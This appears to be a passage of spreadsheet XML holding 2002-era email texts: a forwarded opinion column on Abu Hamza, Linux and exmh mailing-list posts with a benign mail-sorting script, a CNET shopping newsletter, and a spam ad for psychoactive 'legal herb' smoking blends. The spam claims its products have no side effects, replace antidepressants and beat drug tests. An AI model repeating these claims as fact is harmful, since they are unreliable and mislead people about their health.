 and the press. And this last point is because, we tell ourselves, endlessly
 - repeating the mantra over and over again, and fervently wishing it to be
 true - Hamza is not "representative" of British Muslims, as if British
 Muslims were a simple, homogenous thing with a single voice that one could
 turn to every now and then for explanation. And perhaps succour.
 The trouble is, in the first month or so after the twin towers attack he was
 revealed to be rather more "representative" than the list of those
 government-approved Muslim spokesmen who were - uncomfortably, I suspect -
 dragooned briefly into statements of support for the war against terrorism
 and a blanket condemnation of the Taliban.
 An opinion poll commissioned by Radio 4's Today programme revealed that an
 overwhelming majority of British Muslims were against George Bush's crusade.
 One in six were, to put it mildly, ambivalent about the attack on the US
 (the remainder condemned the attack unequivocally). A large majority thought
 the war against terrorism was a war against Islam.
 Which is what Hamza said, repeatedly. But it was something that, at the
 time, we didn't want to hear. Now, if you quiz the man on present policy at
 home and abroad he comes across - superficially, at least - as someone from
 the liberal left. No war against Iraq; Britain to become independent of US
 foreign policy and attempt rapprochement with Arab states; stronger action
 against Israel; mistrust of global capitalism; redistribution of wealth.
 Nor is he particularly anti-semitic, so far as I can tell, although I don't
 suppose he will be holidaying in Eilat this year. In yesterday's Guardian,
 the chief rabbi expressed a willingness to talk to Hamza and was grateful
 for the sheikh's message of condolence when a London synagogue was attacked.
 Which is not to say that Hamza is a peaceable Jeffersonian democrat who has
 been wilfully misrepresented: he is, without question, rather more
 inflammatory in private sermons to his own people than he is in public. His
 ideology is an arid and uncompromising interpretation of Islam: he would be
 happy, in a truly Islamic society, to stone women to death for adultery, for
 example. You and I would find many - perhaps most - of his views utterly
 repellent.
 And that's the point. Because Hamza is the true test of our apparent desire
 to be multicultural. Multiculturalism is not, surely, the cheerful
 appropriation of bits of inoffensive minority cultural behaviour by the
 ruling hegemony. That is a sort of syncopated monoculturalism.
 Multiculturalism is, rather, the ability of society to tolerate views that
 are antithetical to the dominant culture - and maybe learn from them.
 The FBI has been investigating Hamza, but, of course, has found nothing
 remotely incriminating. The real reason for his vilification and persecution
 is simply the pungency of his views.
 It is often said that we should shut him up or arrest him because his
 rhetoric increases hostility against the Muslim population generally. This
 is a perfectly noble argument, but it does not wash.
 You don't defuse a difficult situation by pretending it doesn't exist. And
 if British Muslims - maybe a minority, maybe not - feel a growing sense of
 unease or mystification at the direction of western foreign policy, it is
 not because they have been led in that direction by Hamza. Shutting the man
 up, therefore, won't make a difference.
 It is rather as Louis MacNeice had it:
 The glass is falling hour by hour, the glass will fall for ever.
 But if you break the bloody glass, you won't hold up the weather.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] windows users accessing cvs...
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting kevin lyda (kevin+dated+1031593647.e87527@ie.suberic.net):
 &gt; anyone here have experience with windows cvs clients accessing a cvs
 &gt; server *securely*.  preferably using ssh of some form (putty or cygwin's
 &gt; openssh port) and the wincvs client?
 Here's something I cobbled together:
 http://sourceforge.net/docman/display_doc.php?docid=9026&amp;group_id=13487
 -- 
 Cheers,           "I don't like country music, but I don't mean to denigrate
 Rick Moen         those who do.  And, for the people who like country music,
 rick@linuxmafia.com         denigrate means 'put down'."      -- Bob Newhart
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">--Multipart_Tue_Sep_10_08:56:11_2002-1
 Content-Type: text/plain; charset=US-ASCII
 &gt; From: Hal DeVore &lt;haldevore@acm.org&gt;
 &gt; Sender: exmh-users-admin@spamassassin.taint.org
 &gt; Date: Mon, 09 Sep 2002 22:06:58 -0500
 &gt; 
 &gt; 
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt; On Mon, 9 Sep 2002, "Rick" == Rick Baartman wrote:
 &gt; 
 &gt;   Rick&gt; This is dangerous; I have to remember to re-scan each
 &gt;   Rick&gt; folder I enter. Is there a safeguard for this?
 &gt; 
 &gt; Nope.  Regenerate the cache in the script
 &gt; 
 &gt; 	for f in `folders -fast -r`
 &gt; 	do
 &gt; 		echo sorting $f ...
 &gt; 		sortm +$f
 &gt; 		scan `mhpath +`/$f/.xmhcache
 &gt; 	done
 &gt; 
 &gt; --Hal
 Here is the little script I run I run nightly from cron. It does a
 general tidying of things including sorting and updating the cache.
 I didn't write it and I'm afraid I have lost track of who did, but
 it's worked well for years. I run a similar one to update the glimpse
 indices nightly.
 R. Kevin Oberman, Network Engineer
 Energy Sciences Network (ESnet)
 Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
 E-mail: oberman@es.net			Phone: +1 510 486-8634
 --Multipart_Tue_Sep_10_08:56:11_2002-1
 Content-Type: application/octet-stream
 Content-Disposition: attachment; filename="swasort"
 Content-Transfer-Encoding: 7bit
 #!/bin/tcsh -f
 # 
 #  Sorts all folders
 #
 #  We don't want to sort the drafts folder (and the folders ~/Mail/.glimpse/)
 #
 #  default field to sort .: date
 #  default scan width ....: 100
 #
 set MH_DIR=/usr/local/nmh/bin
 set MAIL=/home/oberman/Mail
 # update $MAIL/.folders
 $MH_DIR/folders -fast -recurse -all &gt; $MAIL/.folders
 # thru all folders ...
 foreach i ( `cat $MAIL/.folders | grep -v \.glim | grep -v drafts` )
     # sort the stuff
     $MH_DIR/mh/sortm +$i -datefield date &gt;&amp; /dev/null
     # and update the cache
     $MH_DIR/scan +$i -width 100 &gt; $MAIL/$i/.xmhcache
 end
 --Multipart_Tue_Sep_10_08:56:11_2002-1--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Legal herb, anytime
</t>
  </si>
  <si>
    <t xml:space="preserve">****************************
 Now Open Seven Days A Week!    
 Call 1-623-974-2295
 ****************************
 &gt;&gt;From the ethnobotanical herbalists who brought the herba supplementals; Kathmandu Temple Kiff 1 &amp; 2 Personal-Choice, pipe-smoking products/substances to the common market!!!  
 We are finally able to offer for your Sensitive/Responsive, Personal Choice Smoking Enjoyment.the Seventh Heaven Temple 3 Ragga Dagga (TM) Pipe-Smoking Substance Supplemental Product. Introduced after three years of research and development; Temple 3 is Personal Choice legal Smoking/Indulgence.Redefined!!!  
 Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offer.in more cultivated/enhanced/viripotent/substantiated format.what had actually already been the most significant, lawful, Personal Choice smoking substance available on the planet.  Seventh Heaven Temple 3 Ragga Dagga (TM) is the sweet, sweet evolution of all of that. 
 * A 20 X MORE VIRIPOTENT HERBA SUPPLEMENT THAN ITS PREDESSORS (TEMPLE 1 &amp; 2).
 * HAPPIER, HAPPY SMOKING!!!
 * INDEED, A DEPRESSIVE REGRESSIVE, SUPPLEMENTAL MOOD-ENHANCER.
 * MORE SOPHISTICATED, UPLIFTING &amp; POISED THAN ILLEGAL SMOKING  SUBSTANCES.
 * NO REGULATION, NO ILLEGALITY, NO FAILED DRUG TESTS!!!
 * INHIBITS STRESS AND ANXIETY.
 * INSPIRES CONTEMPLATIVENESS &amp; CREATIVITY.
 * ENHANCES THE SEXUAL EXPERIENCE!!!
 * GENERATES MORE RESTFUL SLEEP &amp; LUCID DREAMING.
 * A SIGNIFICANT HERBA / BOTANICAL SUPPLEMENT IN THE BATTLES AGAINST DRUG AND ALCOHOL DEPENDENCE!!!!
 * EASILY IGNITED &amp; STOKED.
 * SMOKES SWEETLY! 
 * ABSOLUTELY LEGAL / NON-INVASIVE / NO DOWNSIDE!!!
 * LINGERS FOR A GOOD, GOODLY WHILE!
 * POSSESSES MANY FINE GANJA VIRTUES WITH NONE OF THE NEGATIVES!!!
 * JUST A LITTLE SNIPPET / PINCH GOES A LONG, LONG WAY.JUST 4 OR 5 DRAWS OF YOUR PIPE (A traditional hand herb-pipe is included with each package of Ragga Dagga).
 Temple 3 Ragga Dagga (TM) is an exclusive, botanical/herba, proprietary; Nepalesian formulated, ultra-Sensitive/Responsive, pipe-smoking/stoking substance and is undoubtedly the most prestigious, legal offering of its sort on the planet!!!  
 So smokin/stokin potent is this cutting edge formulation, that we have even been able to establish a very happy clientele market base within the hard-core stoner arena and have made positive, happy, smoking differences in many, many lives.
 ABSOLUTELY LEGAL!  MARVELOUSLY POTENT!! 
 A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon sensitive/responsive herbas primarily cultivated within and imported from the southern and eastern hemispheres; Temple 3 Ragga Dagga (TM) high-ratio factored botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the happiness coffee and tea houses of Nepal/Kathmandu/Amsterdam and in many aspects, possesses a more collected and more focused, less scattered ambiance.  
 Ingredients:
 Temple smoking substances and Temple 3 Ragga Dagga (TM) have always been and will always remain exclusive EXOTIC BOTANICAL RESOURCES House Smoking Substance Specialties.  Temple 3 Ragga Dagga (TM) is both a euphonious/celebratory and relaxing/calming pipe-smoking substance that offers both physical and cerebral significators.  Temple 3 Ragga Dagga (TM) is a proprietary, prescribed botanical amalgamation which includes the following synergistically/synesthesia conglomerated, core-refined, ratio-enhanced herbas/botanicals, resins, essences, flower-tops and oils in extreme ratio extractment ranging from 8.5 to 1, to 100 to 1 viripotent concentrations Drachasha, Chavana Prash, Trikatu, Black Seed Herb, Hybrid Flowering Turnera Diffusa, Capillaris Herba, Angelica Root, Wild Dagga mature leaf matter, Haritaki, Shatavari, Labdunum, Neroli, Unicorn Root, Papaver Rhoes, Dendrobian stems, Calea Zacalechichi buddings, Rue, Amla, Salvia Divinorum, Crocus Sativa, Lotus and Gokshu!
 ra cuttings. 
 Please Note:  Temple 3 Ragga Dagga (TM) is an absolutely legal, herba/botanical, Personal Choice, pipe-smoking substantiality product!!!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Temple 3 Ragga Dagga (TM).  There is certainly no cannabis/marijuana in Temple 3 Ragga Dagga (TM).  And although we are not age-governed by law.Temple 3 Ragga Dagga (TM) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Temple 3 Ragga Dagga (TM) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  All things in their time.  As well, Temple 3 Ragga Dagga (TM) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physicians care in any regard.
 ========================================================
 Here is what our customers are saying about the Temple 3 Ragga Dagga (TM) phenomenon:
 To whom it may concern,
 I was skeptical when I first read your ad.  I grew up in the 70s &amp; 80s.  I was a hard core (alternative smoker) then.  So I knew my stuff.  But drug tests stopped that!  Now I am disabled from a degenerative muscle, ligament, and tendon disease.  I was smoking (an illegal product) for the pain and nausea.  Now I have something just as good; Temple 3, but cheaper, and it is legal!  I also have a lot of trouble sleeping, but the Capillaris Herba made into tea works and smells great!  Your products that I tried so far, are as good or better than your ads say!  That is hard to find nowadays in a company.  Who ever put this stuff together is a botanical genius.  I will be a customer for life!  Also, I talked with a lady on the phone when I was ordering, and asked her to find out if I could get my products and samples to hand out for free.  And just send the customers to you.  Or get a discount on products that I could sell retail to people.  I would prefer the earlier one becau!
 se, I can just talk about your products, I am a great salesman (about 10 years experience), I could hand out flyers, give out little 1 gram pieces as samplers with your business card enclosed, etc.. I am going to be unable to work a regular job for a while, maybe indefinitely?  This deal would give me my own products and samples for free?  You would get free advertising, word of mouth, samples into peoples hands to try, someone that is very good with computers, someone who studied about mail order, Internet, cold calling, small business, good with people, etc..  I would like to be doing something, even if I would get on Social Security Disability.  It is very disheartening not being able to work to support my 2 teenage boys, or do a lot of the things I used to do!  At least I would be able to do something worthwhile.  And great products makes it real easy to sell.  Let me know what you think?
 Sincerely,
 RJ
 Location: Midwest, U.S.A.
 Thank you so much for the Ragga.  It is everything you guys claim, and then some!  I was a bit skeptical when I read your description of its effects, but there is literally no exaggeration in your advertisements.  How nice that this is non-prohibited!  It tastes great and feels great too!  I am so glad I took a chance and ordered.  Blessings to all of you.
 -- Frankie R.
 Location: West Coast, USA
 Im a man of my 40s and I really know my stuff.  I dont drink or do illegal drugs anymore and have found a much more spiritual path.  I used to have to take Valium in the past.  Not anymore with the Temple 3.  It really amazes me how this stuff tastes like the Lebanese and blonde stuff I used to smoke in the 70s.  I am very satisfied with all of your products.  I like them a lot and will be a customer for life for sure.  Whoever makes this stuff is an ARTIST at it.  Who would have thought?!  
 -- A.J.
 Location: United Kingdom
 ========================================================
 Finally, we realize of course that this Temple 3 Ragga Dagga (TM) is not inexpensive. (Temple 3 Ragga Dagga (TM) is a very, very Sweet Smoke and sweetness is never acquired inexpensively.  Such is the way of the Economic Tao....), nor, as a matter of fact, is it inexpensive for us to acquire, factor or master-craft.  Quite simply, it is the very best of its Kind that there is to be acquired.  Just a snippet/pinch of this Temple 3 Ragga Dagga (TM). Four or five draws of your pipe.as is the magical way.lingers for a good, goodly while!!!  (An herb pipe and usage instructions are included with each Temple 3 Ragga Dagga (TM) Package.)
 Seventh Heaven Temple 3 Ragga Dagga (TM) is offered exclusively in 56 gram (2 oz.) and 22 gram (.75 oz.) jiggets/bars for $115.00 and $65.00 respectively.  Sorry, no volume discounts.  Wholesale pricing is available to qualified, select merchants only.
 ************************************************************
 Our other fine herbal, botanical products include the following:
 1.  Sweet Vjestika Aphrodisia Drops (tm); An erotic aphrodisia; sexual intensifier / enhancer liquid amalgamated extract for MEN and WOMEN.
 2. "Seventh Heaven" Prosaka Tablets (tm); a botanical alternative to pharmaceutical medications for calm, balance, serenity and joyful living... 
 3. "Seventh Heaven" Gentle Ferocity Tablets (tm); a most efficacious, non-caffeine, non-ephedrine, non-MaHuang botanical energizer and cutting-edge appetite suppressant...
 4.  Extreme Martial Arts Botanical Remedies; Equivalence Tablets &amp; Dragon Wing Remedy Spray ... pain management that works to alleviate pain even for arthritis and fibromyalgia sufferers...
 *********************************************
 Sweet Vjestika Aphrodisia Drops (tm) inspires and enhances:
 * Extreme body sensitivity
 * Sensitivity to touch
 * Desire to touch and be touched
 * Fantasy, lust, rapture, erogenous sensitivity ... 
 * Prolongs and intensifies foreplay, orgasm &amp; climax
 *********************************************
 "Seventh Heaven" Prosaka Tablets ... 
 Entirely natural, proprietary, botanical prescription comprised of uncommon Asian Herbs for Calm, Balance, Serenity and Joyful Living. "Seventh Heaven" Prosaka is indeed a most extraordinary, viripotent, calming, centering, mood-enhancing, holistically-formulated, exotic herbaceous alternative to pharmaceutical medications for depression, anxiety, stress, insomnia, etc.
 NO side effects!  NO dependency!  Vivaciously Mellow!
 **********************************************
 "Seventh Heaven" Gentle Ferocity Tablets (tm) ... 
 a non-caffeine, non-ephedrine, non-ephedra, non-MaHuang; viripotent, herbaceous prescription for the dynamic energization of body, mind and spirit.  
 This Gentle Ferocity Formulation is amalgamated in accordance with the fundamental Taoist herbal principle of botanical interactiveness and precursorship which in essence is a molecular equation of the relevant botanical/herbal alkaloids and glycosides interacting with one another to prolificate molecular communion and thereby to achieve demonstrative herbal efficaciousness without negative implication to any aspect of human composition.  These Gentle Ferocity Cordial Tablets are incredulously and thoroughly effective.  Enjoy!
 For those of you who seek to achieve most demonstrative/non-invasive/non-prohibitive appetite suppression without the negative implications of ongoing usage of MaHuang Herb, Ephedra/Ephedrine or Caffeine as are so magnaminously utilized in a multitude of herbal "diet aids" entitled as "Thermogenics" ... this is ABSOLUTELY the herbal agenda/product for you!!
 Entirely Natural! Increases Energy! Increases Metabolism! Decreases Appetite!
 ***********************************************
 Extreme Martial Arts Botanical Remedies
 Eastern culture has long had a treatment for bone, muscle, tendon, ligament, sinew and joint distress, traumas, afflictions and constrictions.  We are pleased to offer 
   Equivalence Tablets  &amp;  Dragon Wing Remedy Spray
     (Hei Ping Shun)           (Hei Long Chibang)
 PLEASE NOTE:
 While it is true that all physiological traumas and injuries are unique and that no product can arbitrarily eliminate all of the pain and discomfort in all people all of the time, the combination of Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy (Hei Long Chibang) remedial botanicals does guarantee to at the least:
 1.  Significantly reduce discomfort and pain!
 (In many instances most, if not all, traumas and distress can be eliminated!)
 2.  Significantly increase mobility and strength ratio.
 (Please remember also the significance of proper diet, excercise, rest and prayer.)
 Equivalence Tablets &amp; Dragon Wing Spray Remedials are comprised of entirely natural botanical factors.
 While Equivalence Tablets (Hei Ping Shun) and Dragon Wing Remedy Spray (Hei Long Chibang) are extremely effective individually, they are utilized to maximum advantage when used in conjunction with one another.
 ========================================================
 !!!!Please refer to Introductory Offers further on in this text featuring Temple 3 Ragga Dagga (TM) along with our other very fine Sensitive/Responsive cordial botanical products. Please enjoy!!!  Many Blessings to you all.
 ========================================================
 PRICING INFORMATION:
 1.    SEVENTH HEAVEN Seventh Heaven Temple 3 (tm)
 One     .75 oz. jigget/bar          $65.00
 One    2.0 oz. jigget/bar          $115.00 (Free Capillaris Herba with 2.0 oz. bar. Refer to Capillaris paragraph at end of text)
 2.    SWEET VJESTIKA APHRODISIA DROPS (tm)
 One	1.0 oz. bottle		$90.00   
 Two	1.0 oz. bottles	       $140.00  
 3.    SEVENTH HEAVEN PROSAKA (tm)
 One    100 tablet tin          $40.00
 Three  100 tablet tins        $105.00
 Six    100 tablet tins        $185.00
 4.    SEVENTH HEAVEN GENTLE FEROCITY (tm)
 One   300 tablet jar          $130.00
 5.    Equivalence Tablets - Each bottle contains 90 - 500mg tablets.
 **  3-pack  (270 tablets)    $83.00
 **  6-pack  (540 tablets)    $126.00 (save $40.00)
 **  9-pack  (810 tablets)    $159.00 (save $90.00)
 **  12-pack (1,080 tablets)  $192.00 (save $140.00)
 6.    Dragon Wing Spray Remedy - Each spray bottle contains 4 liquid oz.
 **  3-pack  (3 - 4 oz. bottles)     $83.00
 **  6-pack  (6 - 4 oz. bottles)     $126.00 (save $40.00)
 **  9-pack  (9 - 4 oz. bottles)     $159.00 (save $90.00)
 **  12-pack (12 - 4 oz. bottles)    $192.00 (save $140.00)
 7.    Dynamic Duo Introductory Offers 
 **  3-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $126.00 (save $40.00)
 **  6-pack Equivalence Tabs &amp; 3-pack Dragon Wing   $159.00 (save $50.00)
 **  9-pack Equivalence Tabs &amp; 6-pack Dragon Wing   $215.00 (save $70.00)
 **  12-pack Equivalence Tabs &amp; 9-pack Dragon Wing  $271.00 (save $80.00)
 8.   SWEET APHRODISIA INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; one, 1 oz. bottle of Sweet Vjestika Aphrodisia Drops.  For $150.00 (Reg. $205.00  Save $55)  (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 9.   BODY, MIND, SPIRIT "HEAVENLY" INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka.  For $125.00 (Reg. $155.00  Save $30) (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 10.  "PURE ENERGY" INTRO COMBINATION OFFER 
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity.  For $170.00 (Reg. $245.00  Save $75)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text)
 11.  "SENSITIVE" PREFERENTIAL INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Seventh Heaven Temple 3 &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity For $200.00 (Reg. $285.00  Save $85)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 12.  ULTIMATE HERBACEOUSNESS INTRO COMBINATION OFFER
 Includes one - 2.0 oz. jigget / bar of Seventh Heaven Temple 3, one - 1 oz. bottle of Sweet Vjestika Aphrodisia Drops, one - 100 tablet tin of Prosaka, and one - 300 count jar of Gentle Ferocity for a deep discounted Retail Price of $260.00 (Reg. $375.00  Save $115)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 SPECIAL OFFER:  For a limited time only, you will receive a FREE personal brass hookah with the Ultimate Herbaceous Intro Offer as our gift to you.  This hookah has a retail value of $25.00. 
 **************************************************
 ORDERING INFORMATION:
 For your convenience, you can call us direct with your orders or questions.
 Don't forget to ask for the 2 for 1 Weekend Special!!
  Special good July 6&amp;7, 2002 ONLY
 Call 1-623-974-2295   
 7 Days a Week -- 10:30 AM to 7:00 PM (Mountain Time)
 For all domestic orders, add $6.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.
 **************************************************
 SPECIAL DISCOUNT &amp; GIFT
 Call now and receive a FREE botanical gift!  With every order for a 2.0 oz. jigget / bar of Seventh Heaven Temple 3 or one of our four (4) Intro Combination Offers, we will include as our free gift to you ... a 2.0 oz. package of our ever so sedate, sensitive Asian import, loose-leaf Capillaris Herba for "happy" smoking or brewing ... (a $65.00 retail value).
 ====================================================
 To remove your address from our list, click "Reply" in your email software and type "Remove" in the subject field, then send.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Looking for a quick, affordable way to upgrade your PC? (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Weekly Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;center&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_computers.gif" width="442" height="60" border="0" alt="CNET Shopper Weekly Newsletter"&gt;&lt;br&gt;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&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 &lt;!-- /advertisement label gif --&gt;
 &lt;!-- insert ad here --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQzHxrBSNz4r8dJx98lbK4R" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N296.bsdcnet/B1005052.6;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=23-sFcGINM8KMnTnOaiAv2Y9ZZvQKrR" &gt;Dell Dimension 8000&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kpwFFXfCGLs-y39w-_lR" &gt;Toshiba Sat. 5105-S607&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZASFfui0pIKlsTn8N_Jj9R" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSgVajy_6g_9-hwkp_WEcR" &gt;Dell Latitude C400&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUDup1IEOl5vnMUN5xspoRR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7notyXHgXmIiSupcptbPMPR" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZx3gb_YxB9R0CGk_HtsonR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;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&lt;img src="http://www.cnet.com/i/sh/nl/components_03.gif"&gt;&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD&gt;&lt;font face="arial, helvetica" size="-1" &gt;
 											&lt;B&gt;Is your PC acting a bit sluggish? &lt;/B&gt;
 &lt;BR&gt;
 Does is sometimes choke on large graphics files or spend 
 more time than ever spinning its hard drive?
 &lt;P&gt;
 Adding more RAM to your system may be the perfect answer to
 your computing woes. With more RAM, you'll be able to get 
 more out of your favorite games, graphics applications, and 
 other resource-intensive applications. 
 &lt;P&gt;
 Unfortunately, figuring out what type of RAM to buy can be both 
 difficult and frustrating. 
 &lt;P&gt;
 Luckily, CNET's all-in-one &lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8Jxs5lx1OY0NpbnpTbdL3eR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt; makes finding 
 the perfect memory easier than ever! Whatever type of system
 you have, your just a few clicks away from the upgrade you'll 
 need to get your system living up to its full potential.
 &lt;P&gt;
 Check out CNET's new &lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq5abQCOU7qeZDozn6f5yR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt;
 										&lt;/TD&gt;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1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzY9k7JDDENBEZdihv9KnR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8260093_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfYWF8folrZIGiR6ImOeR" &gt;&lt;B&gt;IBM Deskstar 120GXP &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 120GB&lt;BR&gt;
 								&amp;#149; 7200 rpm&lt;BR&gt;
 								&amp;#149; DMA/ATA-100 (Ultra) EIDE&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Lowest Price: &lt;font color="#CC0000"&gt;$136&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8H37krK6wWDjP2qJ13b4yR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9878039_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDDurOGW7oQqYoj1cTQ4lR" &gt;&lt;B&gt;Lite-On CD-RW&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
